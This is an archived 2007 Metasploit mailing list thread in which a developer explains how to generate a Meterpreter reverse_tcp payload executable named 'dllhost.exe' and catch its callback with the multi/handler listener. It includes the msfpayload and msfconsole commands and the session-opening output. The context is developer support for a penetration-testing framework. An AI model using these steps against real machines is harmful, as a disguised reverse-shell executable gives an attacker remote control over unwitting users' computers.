Metasploit mailing list archives
Meterpreter from a command line
From: chaines at gmail.com (Chuck Haines)
Date: Wed, 28 Feb 2007 09:41:46 -0500
Excellent. I was so close it hurt as I almost had this done. By the way, I've implemented a nice recursive search feature in the meterpreter. I should share the code, but it still has a few bugs and could use some cleaning up.

--chuck

On 2/27/07, mmiller at hick.org <mmiller at hick.org> wrote:

Chuck,

Client-side support for stdapi has not been implemented in C. However, you should be able to accomplish what you're asking by using the payload handler exploit. This will use Metasploit's built-in support for stdapi in ruby, and makes testing a whole lot easier.

Note: make sure you svn update, a recent change had slightly changed the behavior of the payload handler which introduced some problems.

Here's how to go about this:

Step 1: Generate the executable that will act as the host for the meterpreter DLL. This executable hosts the first stage of the payload (the reverse connect):

  $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.4.79.2 X > dllhost.exe
  Created by msfpayload (http://www.metasploit.com).
  Payload: windows/meterpreter/reverse_tcp
  Length: 177
  Options: LHOST=10.4.79.2

Step 2: Start the payload handler

  $ ./msfconsole
   ____________
  < metasploit >
   ------------
         \   ,__,
          \  (oo)____
             (__)    )\
                ||--|| *

         =[ msf v3.0-beta-dev
  + -- --=[ 180 exploits - 104 payloads
  + -- --=[ 18 encoders - 5 nops
         =[ 31 aux

  msf > use multi/handler
  msf exploit(handler) > set LHOST 10.4.79.2
  LHOST => 10.4.79.2
  msf exploit(handler) > exploit
  [*] Started reverse handler
  [*] Starting the payload handler...

Step 3: Run dllhost.exe on the target computer

After running dllhost.exe, you should see this from msfconsole:

  [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
  [*] Sending stage (2834 bytes)
  [*] Sleeping before handling stage...
  [*] Uploading DLL (73739 bytes)...
  [*] Upload completed.
  [*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031)

  meterpreter > idletime
  User has been idle for: 8 secs
  meterpreter >

Keep in mind that you can use the payload handler from msfcli too.

Hope that helps.

On Tue, Feb 27, 2007 at 01:16:21PM -0500, Chuck Haines wrote:

Hello all,

I'm trying to write an example of using the meterpreter from the command line. What I want to do is have an exe that starts meterpreter and connects back to another machine.

I have successfully written the code that starts the meterpreter and connects back, and it communicates just fine. However, when I try and load the stdapi, it tells me it loads successfully, but doesn't actually give me the option of using it. Any help with this would be much appreciated.

I'm using the metcli.exe that comes with the meterpreter to listen for a connection and custom code to connect back to the metcli.exe and perform the init on the metsrv.dll. In the previous release (2.7), I had to modify the metcli so it knew about the stdapi (well, back then fs, net, etc), but it seems that the client portion of the stdapi no longer exists and there is only a server portion. Is that because it was never written or am I missing something?

If someone could give a way to use msfconsole and have it spawn a meterpreter reverse_tcp without having to do an exploit, that would be the best.

Thanks,
Chuck

--
Chuck Haines
chaines at gmail.com
-----------------------------------------------------------
Tau Kappa Epsilon Fraternity
Fraternity For Life
Alumni
http://www.tke.org
irc://irc.deepspace.org/TKE
-----------------------------------------------------------
Deepspace IRC NetAdmin
Providing Web Services for the Disabled
http://www.deepspace.org
irc://irc.deepspace.org/Lobby
-----------------------------------------------------------